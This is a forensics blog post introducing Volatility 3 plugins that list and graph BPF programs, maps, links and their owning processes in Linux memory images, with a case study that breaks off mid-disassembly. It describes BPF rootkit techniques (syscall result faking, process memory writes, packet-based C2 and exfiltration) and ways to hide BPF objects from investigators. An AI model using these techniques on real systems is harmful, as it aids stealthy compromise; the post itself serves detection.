0xeb9f

BPF Memory Forensics with Volatility 3

2023-12-21T00:00:00+00:00

Have you ever wondered how an eBPF rootkit looks like? Well, here’s one, have a good look:

Upon receiving a command and control (C2) request, this specimen can execute arbitrary commands on the infected machine, exfiltrate sensitive files, perform passive and active network discovery scans (like nmap), or provide a privilege escalation backdoor to a local shell. Of course, it’s also trying its best to hide itself from system administrators hunting it with different command line tools such as ps, lsof, tcpdump an others or even try tools like rkhunter or chkrootkit.

Well, you say, rootkits have been doing that for more than 20 years now, so what’s the news here? The news aren’t that much the features, but rather how they are implemented. Everything is realized using a relatively new and rapidly evolving kernel feature: eBPF. Even though it has been in the kernel for almost 10 years now, we’re regularly surprised by how many experienced Linux professionals are still unaware of its existence, not even to mention its potential for abuse.

The above picture was generated from the memory image of a system infected with ebpfkit, an open-source PoC rootkit from 2021, using a plugin for the Volatility 3 memory forensics framework. In this blog post, we will present a total of seven plugins that, taken together, facilitate an in depth analysis of the state of the BPF subsystem.

We structured this post as follows: The next section provides an introduction to the BPF subsystem, while the third section highlights its potential for (ab)use by malware. In section four, we will introduce seven Volatility 3 plugins that facilitate the examination of BPF malware. Section five presents a case study, followed by a section describing our testing and evaluation of the plugins on various Linux distributions. In the last section, we conclude with a discussion of the steps that are necessary to integrate our work into the upstream Volatility project, other challenges we encountered, and open research questions.

Note: The words “eBPF” and “BPF” will be used interchangeably throughout this post.

The BPF Subsystem

Before delving into the complexities of memory forensics, it is necessary to establish some basics about the BPF subsystem. Readers that are already familiar with the topic can safely skip this section.

To us, BPF is first of all an instruction set architecture (ISA). It has ten general purpose registers, which are 64 bit wide, and there are all of the basic operations that you would expect a modern ISA to have. Its creator, Alexei Starovoitov, once described it as a kind of simplified x86-64 and would probably never have imagined that the ISA he cooked up back in 2014 would once enter a standardization process at the IETF. The interested reader can find the current proposed standard here. Of course, there are all the other things that you would expect to come with an ISA, like an ABI that defines the calling convention, and a binary encoding that maps instructions to sequences of four or eight bytes.

The BPF ISA is used as a compilation target (currently by clang - gcc support is on the way) for programs written in high-level languages (currently C and Rust), however, it is not meant to be implemented in hardware. Therefore, it is conceptually more similar to WebAssembly or Java Bytecode than x86-64 or arm64, i.e., BPF programs are meant to be executed by a runtime that implements the BPF virtual machine (VM). Several BPF runtimes exist, but the “reference implementation” is in the Linux kernel.

Runtimes are, of course, free to choose how they implement the BPF VM. The instruction set was defined in a way that makes it easy to implement a one-to-one just in time (JIT) compiler for many CPU architectures. In fact, in the Linux kernel, even non-mainstream architectures like powerpc, sparc or s390 have BPF JITs. However, the kernel also has an interpreter to run BPF programs on architectures that do not yet support JIT compilation.

Aside: The BPF platform is what some call a “verified target”. This means that in order for a program to be valid it has to have some “non-local” properties. Those include the absence of (unbounded) loops, registers and memory can only be read after they have been written to, the stack depth may not exceed a hard limit, and many more. The interested reader can find a more exhaustive description here. In practice, runtime implementations include an up-front static verification stage and refuse to execute programs that cannot be proven to meet these requirements (some runtime checks may be inserted to account for the known shortcomings of static analysis). This static verification approach is at the hearth of BPF’s sandboxing model for untrusted code.

Roughly speaking, the BPF subsystem includes, besides the implementation of the BPF VM, a user and kernel space interface for managing the program life cycle as well as infrastructure for transitioning the kernel control flow in and out of programs running inside the VM. Other subsystems can be made “programmable” by integrating the BPF VM in places where they want to allow the calling of user-defined functions, e.g., for decision making based on their return value. The networking subsystem, for example, supports handing all incoming and outgoing packets on an interface to a BPF program. Those programs can freely rewrite the packet buffer or even decide to drop the packet all together. Another example is the tracing subsystem that supports transitioning control into BPF programs at essentially any instruction via one of the various ways it has to hook into the kernel and user space execution. The final example here is the Linux Security Module (LSM) subsystem that supports calling out to BPF programs at any of its security hooks placed at handpicked choke points in the kernel. There are many more examples of BPF usage in the kernel and even more in academic research papers and patches on the mailing list, but we guess we conveyed the general idea.

BPF programs can interact with the world outside of the VM via so called helpers or kfuncs, i.e., native kernel functions that can be called by BPF programs. Services provided by these functions range from getting a timestamp to sending a signal to the current task or reading arbitrary memory. Which functions a program can call depends on the program type that was selected when loading it into the VM. When reversing BPF programs, looking for calls to interesting kernel functions is a good point to start.

The second ingredient you need in order to get any real work done with a BPF program are maps. While programs can store data during their execution using stack memory or by allocating objects on the heap, the only way to persist data across executions of the same program are maps. Maps are mutable persistent key value stores that can be accessed by BPF programs and user space alike, as such they can be used for user-to-BPF, BPF-to-user, or BPF-to-BPF communication, where in the last case the communicating programs may be different or the same program at different times.

Another relevant aspect of the BPF ecosystem is the promise of compile once run everywhere (CORE), i.e., a (compiled) BPF program can be run inside of a wide range of Linux kernels that might have different configurations, versions, compilers, and even CPU architectures. This is achieved by having the compiler emit special relocation entries that are processed by a user-space loader prior to loading a program into the kernel’s BPF VM. The key ingredient that enables this approach is a self-description of the running kernel in the form of BPF Type Format (BTF) information, which is made available in special files under /sys/kernel/btf/. For example, BPF source code might do something like current->comm to access the name of the process in whose context the program is running. This might generate an assembly instruction that adds the offset of the comm field to a pointer to the task descriptor that is stored in a register, i.e., ADD R5, IMM. However, the immediate offset might vary due to kernel version, configuration, structure layout randomization or CPU architecture. Thus, the compiler would emit a relocation entry that tells the user-space loader running on the target system to check the kernel’s BTF information in order to overwrite the placeholder with the correct offset. Together with other kinds of relocations, which address things like existence of types and enum variants or their sizes, the loader be used to run the same BPF program on a considerable number of kernels.

Aside: A problem with the CORE implementation described above is that signatures over BPF programs are meaningless as the program text will be altered by relocations before loading. To allow for a meaningful ahead of time signature there is another approach in which a loader program is generated for the actual program. The loader program is portable without relocations and is signed and loaded together with the un-relocated bytecode of the actual program. Thus, the problem is solved as all text relocations happen in the kernel, i.e., after signatures have been verified.

However, there are of course limits to the portability of BPF programs. As we all know, the kernel takes great care to never break user space, within kernel land, on the other hand, there are no stability guarantees at all. BPF programs are not considered to be part of user space and thus there are no forward or backward compatibility guarantees. In practice, that means that APIs exposed to BPF could be removed or changed, attachment points could vanish or change their signature, or programs that are currently accepted by the static verifier could be rejected in the future. Furthermore, changes in kernel configuration could remove structure fields, functions, or kernel APIs that programs rely on. In that sense, BPF programs are in a position similar to out-of-tree kernel modules. That being said, due to CORE, there is no need to have the headers of the target kernel available at compile time and thus a lot less knowledge about the target is needed to be confident that the program will be able to run successfully. Furthermore, in the worst case the program will be rejected by the kernel, but there are no negative implications on system stability by attempting to load it.

Finally, we should mention that BPF is an entirely privileged interface. There are multiple BPF-related capabilities that a process can have, which open up various parts of the subsystem. This has not always been the case. A few years ago, unprivileged users were able to load certain types of BPF programs, however, access to the BPF VM comes with two potential security problems. First, the security entirely relies on the correctness of the static verification stage, which is notoriously complex and must keep up with the ever-expanding feature set. It has been demonstrated that errors in the verification process can be exploited for local privilege escalation, e.g., CVE-2020-8835 or CVE-2021-3490. Second, even within the boundaries set by the verifier, the far-reaching control over the CPU instructions that get executed in kernel mode opens up the door for Spectre attacks, c.f., Jann Horn’s writeup or the original Spectre paper. For those reasons, the kernel community has decided to remove unprivileged access to BPF by default.

BPF Malware

To better understand the implications the addition of the BPF VM has for the Linux malware landscape, we would like to start with a quote from “BPF inventor” Alexei Starovoitov: “If in the past the whole kernel would maybe be [a] hundred of programmers across the world, now a hundred thousand people around the world can program the kernel thanks to BPF.”, i.e., BPF significantly lowers the entry barrier to kernel programming and shipping applications that include kernel-level code. While the majority of new kernel programmers are well-intentioned and aim to develop innovative and useful applications, experience has shown that there will be some actors who seek to use new kernel features for malicious purposes.

From a malware author’s perspective, one of the first questions is probably how likely it is that a target system will support the loading of malicious BPF programs. According to our personal experience it is safe to say that most general-purpose desktop and server distributions enable BPF. The feature is also enabled in the android-base.config as BPF plays a significant role in the Android OS, i.e., essentially every Android device should support BPF - from your fridge to your phone. Concerning the custom kernels used by big tech companies let me quote Brendan Gregg, another early BPF advocate: “As companies use more and more eBPF also, it becomes harder for your operating system to not have eBPF because you are no longer eligible to run workloads at Netflix or at Meta or at other companies.”. What is more, Google relies on BPF (through cilium) in its Kubernetes engine and Facebook uses it for its layer 4 load balancer katran. For a more comprehensive survey of BPF usage in cloud environments we recommend section 5 of Cross Container Attacks: The Bewildered eBPF on Clouds by Yi He et al. Thus, most of the machines that constitute “the cloud” are likely to support BPF. This is particularly interesting as signature verification for BPF programs is still not available, making it the only way to run kernel code on locked-down systems that restrict the use of kernel modules.

However, enabling the BPF subsystem, i.e., CONFIG_BPF, is only the beginning of the story. There are many compile-time or run-time configuration choices that affect the capabilities granted to BPF programs, and thus the ways in which they can be used to subvert the security of a system. Giving a full overview of all the available switches and their effect would exceed the scope of this post, however, we will mention some knobs that can be turned to stop the abuses mentioned below.

If you search for the term “BPF malware” these days, you will find rather sensational articles with titles like “eBPF: A new frontier for malware”, “How BPF-Enabled Malware Works”, “eBPF Offensive Capabilities – Get Ready for Next-gen Malware”, “Nothing is Safe Anymore - Beware of the “eBPF Trojan Horse” or “HOW DOES EBPF MALWARE PERFORM AGAINST STAR LAB’S KEVLAR EMBEDDED SECURITY?”. Needless to say, that they contain hardly any useful information. The truth is that we are not aware of any reports of in-the-wild malware using BPF. Nevertheless, there is no shortage in open source PoC BPF malwares on GitHub. The two biggest ones are probably ebpfkit and TripeCross, however, there are many smaller projects like nysm, sshd_backdoor, boopkit, pamspy, or bad bpf as well as snippet collections like nccgroup’s bpf tools, Offensive-BPF. Researchers also used malicious BPF programs to escape container isolation in multiple real-world cloud environments.

There are a couple of core shenanigans that those malwares are constructed around, three of which we will briefly describe here.

It is possible to transparently (for user space) skip the execution of any system call or to manipulate just the return value after it was executed. This is since BPF can be used for the purpose of error injection. To be precise, any function that is annotated with the ALLOW_ERROR_INJECTION macro can be manipulated in this way, and every system call is automatically annotated via the macro that defines it. One would hope that the corresponding configurations BPF_KPROBE_OVERRIDE and CONFIG_FUNCTION_ERROR_INJECTION would not be enabled in kernels shipped to end users, but they are. There are many things that one can do by lying to user space in this way, one example would be to block the sending of all signals to a specific process, e.g., to protect it from being killed. Interestingly, the same helper is also used by BPF-based security solutions like tetragon, which are deployed in production cloud environments.

Another common primitive is to write to memory of the current process, which gives attackers the power to perform all sorts of interesting memory corruptions. One of the more original ideas is to inject code into a process by writing a ROP chain onto its stack. The chain sets up everything to load a shared library and cleanly resumes the process afterwards. More generally, the helper bpf_probe_write_user is involved in many techniques to hide objects, e.g., sockets or BPF programs, from user space or when manipulating apparent file and directory contents, e.g., /proc, /etc/sudoers or ~/.ssh/authorized_keys. In particular, those apparent modifications cannot be caught with file system forensics as they are only happening in the memory of the process that attempts to access the resource, e.g., see textreplace for an example that allows arbitrary apparent modifications of file contents. While there are in fact a couple of legitimate programs (like the Datadog-agent) using this function, it is probably wise to enable CONFIG_LOCK_DOWN_KERNEL_FORCE_INTEGRITY before compilation.

A rather peculiar aspect of BPF malware is how it communicates over the network. BPF programs are not able to initiate network connections by themselves, but as one of the main applications of BPF is in the networking subsystem, they have far-reaching capabilities when it comes to managing existing traffic. For example, XDP programs get their hands on packets very early in the receive path, long before mechanisms like netfilter, which is much further up the network stack, get a chance to see them. In fact, there are high-end NICs that support running BPF programs on the device’s proces rather than the host CPU. Furthermore, programs that handle packets can usually modify, reroute, or drop them. In combination, this is often used to receive C2 commands while at the same time hiding the corresponding packets from the rest of the kernel by modifying or dropping them. In addition, BPF’s easy programmability makes it simple to implement complex, stateful triggers. To exfiltrate data from the system, the contents, and potentially also the recipient data, of outgoing packets are modified, for example by traffic control (tc) hooks. For unreliable transport protocols higher layers will deal with the induced packet loss, while for TCP the retransmission mechanism ensures that applications will not be impacted. Turn off CONFIG_NET_CLS_BPF and CONFIG_NET_ACT_BPF to disable tc BPF programs.

While the currently charted BPF malware landscape is limited to hobby projects by security researchers and other interested individuals, it would unfortunately not be unheard of that the same projects are eventually discovered during real-world incidents. Advanced Linux malwares, on the other hand, will most likely choose to implement their own BPF programs when they believe that it is beneficial for their cause, for instance to avoid detection by using a mechanism that is not yet well known to the forensic community. Some excerpts from the recent talk by Kris Nova at DevOpsDays Kyiv give an interesting insight into the concerns that the Ukrainian computer security community had, and still has, regarding the use of BPF in Russian attacks on their systems.

It would be dishonest to claim that there is a general schema that you can follow while analyzing an incident to discover all malicious BPF programs. As so often, the boundaries between monitoring software, live patches, security solutions and malware are not clearly defined, e.g., in addition to bpf_override_retun tetragon also uses bpf_send_singal. The first step could be to obtain a baseline of expected BPF-related activity, and carefully analyze any deviations or anomalies. Additionally, a look at the kernel configuration can help to decide which kinds of malicious activity are fundamentally possible. Furthermore, programs that make use of possibly malicious helper functions, like bpf_probe_wite_user, bpf_send_signal, bpf_override_return, or bpf_skb_store_bytes should be reverse engineered with particular scrutiny. In addition, there are some clear indicators of malicious activity, like the hiding of programs, which we will discuss in more detail below. Finally, once program signatures are upstreamed, it is highly recommended to enable and enforce them to lock down this attack surface.

From now on, we will shift gears and focus on the main topic of this post, hunting BPF malware in main memory images.

Aside: The bvp47, Symbiote and BPFdoor rootkits are often said to be examples of BPF malware. However, they are using only what is now known as classic BPF, i.e., the old-school packet filtering programs used by programs like tcpdump.

Volatility Plugins

Volatility is a memory forensics framework that can be used to analyze physical memory images. It uses information about symbols and types of the operating system that was running on the imaged system to recover high-level information, like the list of running processes or open files, from the raw memory image.

Individual analyses are implemented as plugins that make use of the framework library as well as other plugins. Some of those plugins are closely modeled after core unix utilities, like the ps utility for listing processes, the ss utility for listing network connections or the lsmod utility for listing kernel modules. Other plugins implement checks that search for common traces of kernel rootkit activity, like the replacement of function pointers or inline hooks.

There may be multiple ways to obtain the same piece of information, and thus multiple plugins that, on first sight, serve the same purpose. Inconsistencies between the methods, however, could indicate malicious activity that tries to hide its presence or just be artifacts of imperfections in the acquisition process. In any case, inconsistencies are something an investigator should look into.

In this section we present seven Volatility plugins that we have developed to enable analysis of the BPF subsystem. Three of these are modelled after subcommands of the bpftool utility and provide basic functionality. We then present three plugins that retrieve similar information from other sources and can thus be used to detect inconsistencies. Finally, we present a plugin that aggregates information from four other plugins to make it easier to interpret.

_Note: We published the source code for all of our plugins on GitHub. We would love to see your contributions there! :)

Listing Programs, Maps & Links

Arguably the most basic task that you could think of is simply listing the programs that have been loaded into the BPF VM. We will start by doing this on a live system, feel free to follow along in order to discover what your distribution or additional packages that you installed have already loaded.

Live System

The bpftool user-space utility allows admins to interact with the BPF subsystem. One of the most basic tasks it supports is the listing of all loaded BPF programs, maps, BTF sections, or links. We are sometimes going to refer to these things collectively as BPF objects. Roughly speaking, links are a mechanism to connect a loaded program to a point where it is being invoked, and BTF is a condensed form of DWARF debug information.

Lets start with an example to get familiar with the information that is displayed (run btftool as root):

# bpftool prog list
[...]
22: lsm  name restrict_filesystems  tag 713a545fe0530ce7  gpl
	loaded_at 2023-11-26T10:31:42+0100  uid 0
	xlated 560B  jited 305B  memlock 4096B  map_ids 13
	btf_id 53
[...]

From left-to-right and top-to-bottom we have: ID used as an identifier for user-space, program type, program name, tag that is a SHA1 hash over the bytecode, license, program load timestamp, uid of process that loaded it, size of the bytecode, size of the jited code, memory blocked by the program, ids of the maps that the program is using, ids to the BTF information for the program.

We can also inspect the bytecode

# bpftool prog dump xlated id 22
int restrict_filesystems(unsigned long long * ctx):
; int BPF_PROG(restrict_filesystems, struct file *file, int ret)
   0: (79) r3 = *(u64 *)(r1 +0)
   1: (79) r0 = *(u64 *)(r1 +8)
   2: (b7) r1 = 0
[...]

where each line is the pseudocode of a BPF assembly instruction and we even have line info, which is also stored in the attached BTF information. We can also dump the jited version and confirm that is is essentially a one-to-one translation to x86_64 machine code (depending on the architecture your kernel runs on):

# bpftool prog dump jited id 22
int restrict_filesystems(unsigned long long * ctx):
bpf_prog_713a545fe0530ce7_restrict_filesystems:
; int BPF_PROG(restrict_filesystems, struct file *file, int ret)
   0:	endbr64
   4:	nopl	(%rax,%rax)
   9:	nop
   b:	pushq	%rbp
   c:	movq	%rsp, %rbp
   f:	endbr64
  13:	subq	$24, %rsp
  1a:	pushq	%rbx
  1b:	pushq	%r13
  1d:	movq	(%rdi), %rdx
  21:	movq	8(%rdi), %rax
  25:	xorl	%edi, %edi
[...]

Furthermore, we can display basic information about the maps used by the program

# bpftool map list id 13
13: hash_of_maps  name cgroup_hash  flags 0x0
	key 8B  value 4B  max_entries 2048  memlock 165920B

as well as their contents (which are quite boring in this case).

# bpftool map dump id 13
Found 0 elements

We can also get information about the variables and types (BTF) defined in the program. This is somewhat comparable to the DWARF debug information that comes with some binaries - just that it is harder to strip since its needed by the BPF VM.

# bpftool btf dump id 53
[1] PTR '(anon)' type_id=3
[2] INT 'int' size=4 bits_offset=0 nr_bits=32 encoding=SIGNED
[3] ARRAY '(anon)' type_id=2 index_type_id=4 nr_elems=13
[4] INT '__ARRAY_SIZE_TYPE__' size=4 bits_offset=0 nr_bits=32 encoding=(none)
[5] PTR '(anon)' type_id=6
[6] TYPEDEF 'uint64_t' type_id=7
[7] TYPEDEF '__uint64_t' type_id=8
[8] INT 'unsigned long' size=8 bits_offset=0 nr_bits=64 encoding=(none)
[9] PTR '(anon)' type_id=10
[10] TYPEDEF 'uint32_t' type_id=11
[11] TYPEDEF '__uint32_t' type_id=12
[12] INT 'unsigned int' size=4 bits_offset=0 nr_bits=32 encoding=(none)
[13] STRUCT '(anon)' size=24 vlen=3
	'type' type_id=1 bits_offset=0
	'key' type_id=5 bits_offset=64
	'value' type_id=9 bits_offset=128
[...]

As we said earlier, links are what connects a loaded program to a point that invokes it.

# bpftool link list
[...]
3: tracing  prog 22
	prog_type lsm  attach_type lsm_mac
	target_obj_id 1  target_btf_id 82856

Again, from left-to-right and top-to-bottom we have: ID, type, attached program’s ID, program’s load type, type that program was attached with, ID of the BTF object that the following field refers to, ID of the type that the program is attached to (functions can also have BTF entries). Note that everything but the first line depends on the type of link that is examined. To find the point where the program is called by the kernel we can inspect the relevant BTF object (the kernel’s in this case).

# bpftool btf dump id 1 | rg 82856
[82856] FUNC 'bpf_lsm_file_open' type_id=16712 linkage=static

Thus we can conclude that the program is invoked early in the do_dentry_open function via the security_file_open LSM hook and that its return value decides whether the process will be allowed to open the file (we’re skipping some steps here, see our earlier article for the full story).

We performed this little “live investigation” on a laptop running Arch Linux with kernel 6.6.2-arch1-1 and the program wasn’t malware but rather loaded by systemd on boot. You can find the commit that introduced the feature here. Again, you can see that in the future there will be more legitimate BPF programs running on your systems (servers, desktops and mobiles) than you might think!

Memory Image

As a first step towards BPF memory forensics it would be nice to be able to perform the above investigation on a memory image. We will now introduce three plugins that aim to make this possible.

We already saw that all sorts of BPF objects are identified by an ID. Internally, these IDs are allocated using the IDR mechanism, a core kernel API. For that purpose, three variables are defined at the top of /kernel/bpf/syscall.c.

[...]
static DEFINE_IDR(prog_idr);
static DEFINE_SPINLOCK(prog_idr_lock);
static DEFINE_IDR(map_idr);
static DEFINE_SPINLOCK(map_idr_lock);
static DEFINE_IDR(link_idr);
static DEFINE_SPINLOCK(link_idr_lock);
[...]

Under the hood, the ID allocation mechanism uses an extensible array (xarray), a tree-like data structure that is rooted in the idr_rt member of the structure that is defined by the macro. The ID of a new object is simply an unused index into the array, and the value stored at this index is a pointer to a structure that describes it. Thus, we can re-create the listing capabilities of bpftool by simply iterating the array. You can find the code that does so in the XArray class.

Dereferencing the array entries leads us to structures that hold most of the information displayed by bpftool earlier.

Entries of the prog_idr point to objects of type bpf_prog, the aux member of this type points to a structure that hols additional information about the program. We can see how the information bpftool displays is generated from these structures in the bpf_prog_get_info_by_fd function by filling a bpf_prog_info struct. The plugin bpf_listprogs re-implements some of the logic of this functions and displays the following pieces of information.

columns: list[tuple[str, type]] = [
    ("OFFSET (V)", str),
    ("ID", int),
    ("TYPE", str),
    ("NAME", str),
    ("TAG", str),
    ("LOADED AT", int),
    ("MAP IDs", str),
    ("BTF ID", int),
    ("HELPERS", str),
]

Some comments are in order:

OFFSET (V) are the low 6 bytes of the bpf_prog structure’s virtual address. This is useful as a unique identifier of the structure.
LOADED AT is the number of nanoseconds since boot when the program was loaded. Converting it to an absolute timestamp requires parsing additional kernel time-keeping structures and is not in scope for this plugin. There exist Volatility patches that add this functionality but they are not upstream yet. Once they are, it should be trivial to convert this field to match the bpftool output.
HELPERS is a field that is not reported by bpftool. It displays a list of all the kernel functions that are called by the BPF program, i.e., BPF helpers and kfuncs, and is helpful to quickly identify programs that use possibly malicious or non-standard helpers.
The reporting of memory utilization is omitted as we consider it to be less important for forensic investigations, however, it would be easy to add.

The second bpftool functionality the plugin supports is the dumping of programs in bytecode and jited forms. To dump the machine code of the program, we follow the bpf_func pointer in the bpf_prog structure, which points to the entrypoint of the jited BPF program. The length of the machine code is stored in the jited_len field of the same structure. While we support dumping the raw bytes to a file, their analysis is tedious due to missing symbol information. Thus, we also support disassembling the program and annotating all occurring addresses with the corresponding symbol, which makes the programs much easier to analyze.

Dumping the BPF bytecode is straightforward as well. The flexible insni array member of the bpf_prog structure holds the bytecode instructions and the len field holds their number. Here, we also support dumping the raw and disassembled bytecode. However, the additional symbol annotations are not implemented. As the bytecode is not “what actually runs”, we consider this information more susceptible to anti-forensic tampering and thus focused on the machine code, which is what is executed when invoking the program.

Note: We use Capstone for disassembling the BPF bytecode. Unfortunately, Capstone’s BPF architecture is outdated and thus bytecode is sometimes not disassembled entirely. As a workaround, you can dump the raw bytes and use another tool to disassemble them.

Entries of the map_idr point to bpf_map objects. The bpf_map_info structure parsed by bpftool is filled in bpf_map_get_info_by_fd and the plugin bpf_listmaps is simply copying the logic to display the following pieces of information.

columns: list[tuple[str, Any]] = [
        ("OFFSET (V)", str),
        ("ID", int),
        ("TYPE", str),
        ("NAME", str),
        ("KEY SIZE", int),
        ("VALUE SIZE", int),
        ("MAX ENTRIES", int),
]

Dumping the contents of maps is hard due to the diversity in map types. Each map type requires its own handling, beginning with manually downcasting the bpf_map object to the correct container type. One approach to avoid implementing each lookup mechanism separately, would be through emulation of the map_get_next_key and bpf_map_copy_value kernel functions, where the former is a function pointer found in the map’s operations structure. However, this is not in scope for the current plugin.

Furthermore, the dumping could be enhanced by utilizing the BTF information that is optionally attached to the map to properly display keys and values, similar to the bpf_snprintf_btf helper that can be used to pretty-print objects using their BTF information.

We implemented the dumping for the most straightforward map type - arrays - but the plugin does not support dumping other types of maps.

Entries of the link_idr point to objects of type bpf_link. Again, there is an informational structure, bpf_link_info, which is this time filled in the bpf_link_get_info_by_fd function. By analyzing this function, we wrote the bpf_listlinks plugin that retrieves the following pieces of information.

columns: list[tuple[str, Any]] = [
    ("OFFSET (V)", str),
    ("ID", int),
    ("TYPE", str),
    ("PROG", int),
    ("ATTACH", str),
]

Here, the last column is obtained by mimicking the virtual call to link->ops->fill_link_info that adds link-type specific information about the associated attachment point, e.g., for tracing links it adds the BTF object and type IDs we saw earlier.

LSM Hooks

Our three listing plugins have one conceptual weakness in common: they rely entirely on information obtained by parsing the (prog|map|link)_idrs. However, the entire ID mechanism is in the user-facing part of the BPF subsystem, its simply a means for user space to refer to BPF objects in syscalls. Thus, our plugins are susceptible to trivial anti-forensic tampering.

In our research, we prototyped two anti-forensic methods that remove BPF objects from these structures while still keeping the corresponding program active in the kernel. First, the more straightforward way is to simply write a kernel module that uses standard APIs to remove IDs from the IDRs. The second one is based on the observation that the lifecycle of BPF objects is managed via reference counts. Thus, if we artificially increment the reference count of an object that (indirectly) holds references to all other objects that are required to operate a BPF program, e.g., a link, we can prevent the program’s destruction when all “regular” references are dropped.

One approach to counter these anti-forensic measures is to “approach from the other side”. Instead of relying on information from sources that are far detached from the actual program execution, we go to the very places and mechanisms that invoke the program. The downside is obviously that this low-level code is much more program-type and architecture specific, the results, on the other hand, are more robust.

In a previous blog post we described the low-level details that lead up to the execution of BPF LSM programs in great detail. Based on this knowledge, we developed the bpf_lsm plugin that can discover hidden BPF programs attached to security hooks. In short, the plugin checks the places where the kernel control flow may be diverted into the BPF VM for the presence of inline hooks. If they are found, it cross checks with the links IDR to see if there is a corresponding link, the absence of which is a strong indication of tampering. Additionally, the plugin is also valuable in the absence of tampering, as it shows you the exact program attachment point without the need to manually resolve BTF IDs. In particular, the plugin displays the number of attached programs and their IDs along with the name of the LSM hook where they are attached.

columns: list[tuple[str, type]] = [
    ("LSM HOOK", str),
    ("Nr. PROGS", int),
    ("IDs", str),
]

Networking Hooks

As we described above, traffic control (tc) programs are especially useful for exfiltrating information from infected machines, e.g., by hijacking existing TCP connections. Thus, the second plugin that obtains its information from more tamper resistant sources targets tc BPF programs. It only relies on the mini_Qdisc structure that is used on the transmission and receive fast paths to look up queuing disciplines (qdisc) attached to a network device.

We use the ifconfig plugin by Ofek Shaked and Amir Sheffer to obtain a list of all network devices. Then, we find the above-mentioned structure and use it to collect all BPF programs that are involved into qdiscs on this device. With kernel 6.3 the process of locating the mini_Qdisc from the network interface changed slightly due to the introduction of link-based attachment of tc programs, however, the plugin recognizes and handles both cases. Finally, the bpf_netdev plugin displays the following information about each interface where at least one BPF program was found,

columns: list[tuple[str, type]] = [
    ("NAME", str),
    ("MAC ADDR", str),
    ("EGRESS", str),
    ("INGRESS", str),
]

where the EGRESS and INGRESS hold the IDs of the programs that process packets flowing into the respective direction.

Finding Processes

Yet another way to discover BPF objects is through the processes that hold on to them. As with many other resources, programs, links, maps, and btf are represented to processes as file descriptors. They can be used to act on the object, retrieve information about it, and serve as a mechanism to clean up after processes that did not exit gracefully. Furthermore, an investigator might want to find out which process holds on to a specific BPF object in order to investigate this process further.

Thus, the bpf_listprocs plugin displays the following pieces of information for every process that holds on to at least one BPF object via a file descriptor.

columns: list[tuple[str, type]] = [
    ("PID", int),
    ("COMM", str),
    ("PROGS", str),
    ("MAPS", str),
    ("LINKS", str),
]

Here, the PROGS. MAPS, and LINKS columns display the IDs of the respective objects. This list is generated by iterating over all file descriptors and the associated file structures. BPF objects are identified by checking the file operations f_op pointer, and the corresponding bpf_(prog|map|link) structures are found by following the pointer stored in the private member.

Not every BPF object must be reachable from the process list, however. They can, for example, also be represented as files under the special bpf filesystem, which is usually mounted at /sys/fs/bpf, or processes can close file descriptors and the object will remain alive as long as there are other references to it.

Connecting the Dots

Finally, we would like to present the bpf_graph plugin, a meta analysis that we have build on top of the four listing plugins. As its name suggest, its goal is to visualize the state of the BPF subsystem as a graph.

There are four types of nodes in this graph: programs, maps, links and processes. Different node types are distinguished by shape. Within a node type, the different program/map/link types are distinguished by color and process nodes are colored based on their process ID (PID). Furthermore, map and program nodes are labeled with the ID and name of the object, link nodes are labeled with the ID and attachment information of the link, and process nodes receive the PID and comm (name of the user-space program binary) of their process as labels.

There are three types of edges to establish relationships between nodes: file descriptor, link, and map. File descriptor edges are dotted and connect processes to BPF objects that they have an open fd for. Link edges are dashed and connect BPF links to the program they reference. Finally, map edges are drawn solid and connect maps to all of the programs that use them.

Especially for large applications with hundreds or even thousands of objects, it is essential to be able to filter the graph to make it useful. We have therefore implemented two additional options that can be passed to the plugin. First, you can pass a list of node types to include in the output. Second, you can pass a list of nodes, and only the connected components that contain at least one of those nodes will be drawn.

The idea of this plugin is to make the information of the four listing plugins more accessible to investigators by combining it into a single picture. This is especially useful for complex applications with possibly hundreds of programs and maps, or on busy systems where many different processes have loaded BPF programs.

Plugin output comes in two forms, a dot-format encoding of the graph, where each BPF object node has metadata containing all of the plugin columns, and as a picture of the graph, drawn with a default layout algorithm. The latter should suffice for most users, but the former allows advanced use-cases to do further processing.

Note: We provide standalone documentation for all plugins in our project on GitHub.

Case Study

In this section we will use the plugins to examine the memory image of a system with a high level of BPF activity. To get a diverse set of small BPF applications we launched the example programs that come with libbpf-bootstrap and some of the kernel self-tests. You can download the memory image and symbols to follow along. If you prefer to analyze a single, large application have a look at the krie example in our plugin documentation.

A good first step is to use the graph plugin to get an overview of the subsystem (# vol -f /io/dumps/debian-bookworm-6.1.0-13-amd64_all.raw linux.bpf_graph).

As we can see, there are several components corresponding to different processes, each of which holds a number of BPF resources. Let us begin by examining the “Hello, World” example of BPF, the minimal program:

// SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause
/* Copyright (c) 2020 Facebook */
#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>

char LICENSE[] SEC("license") = "Dual BSD/GPL";

int my_pid = 0;

SEC("tp/syscalls/sys_enter_write")
int handle_tp(void *ctx)
{
	int pid = bpf_get_current_pid_tgid() >> 32;

	if (pid != my_pid)
		return 0;

	bpf_printk("BPF triggered from PID %d.\n", pid);

	return 0;
}

The above source code is compiled with clang to produce an ELF relocatable object file. It contains the BPF bytecode along with additional information, like BTF sections, CORE relocations, programs as well as their attachment mechanisms and points, maps that are used and so on. This ELF is then embedded into a user space program that statically links against libbpf. At runtime, it passed the ELF to libbpf, which takes care of all the relocations and kernel interactions required to wire up the program to the BPF VM.

With the above C code in the back of our heads, we can now have a look at the relevant component of live system’s BPF object graph. To limit the output of the plugin to the connected components that contain certain nodes, we can add the --components flag to the invocation and give it a list of nodes (the format is <node_type>-<id> where node_type is in {map,link,prog,proc} and id is the BPF object ID or PID).

As we can see, the ELF has caused libbpf to create a program, two maps and a link while loading. We can now use our plugins to gather more information about each object. Let’s start with the program itself.

# vol -f /io/dumps/debian-bookworm-6.1.0-13-amd64_all.raw linux.bpf_listprogs --id 98 --dump-jited --dump-xlated
Volatility 3 Framework 2.5.0
Progress:  100.00               Stacking attempts finished
OFFSET (V)      ID      TYPE    NAME    TAG     LOADED AT       MAP IDs BTF ID  HELPERS

0xbce500673000  98      TRACEPOINT      handle_tp       6a5dcef153b1001e        1417821088492   40,45   196     bpf_get_current_pid_tgid,bpf_trace_printk

By looking at the last column we can see that it is indeed using two kernel helper functions, where the apparent call to bpf_printk turns out to be a macro that expands to bpf_trace_printk. If we look at the program byte and the machine code side by side, we can discover a few things.

# cat .prog_0xbce500673000_98_bdisasm
0x0: 85 00 00 00 10 b2 02 00                         call 0x2b210
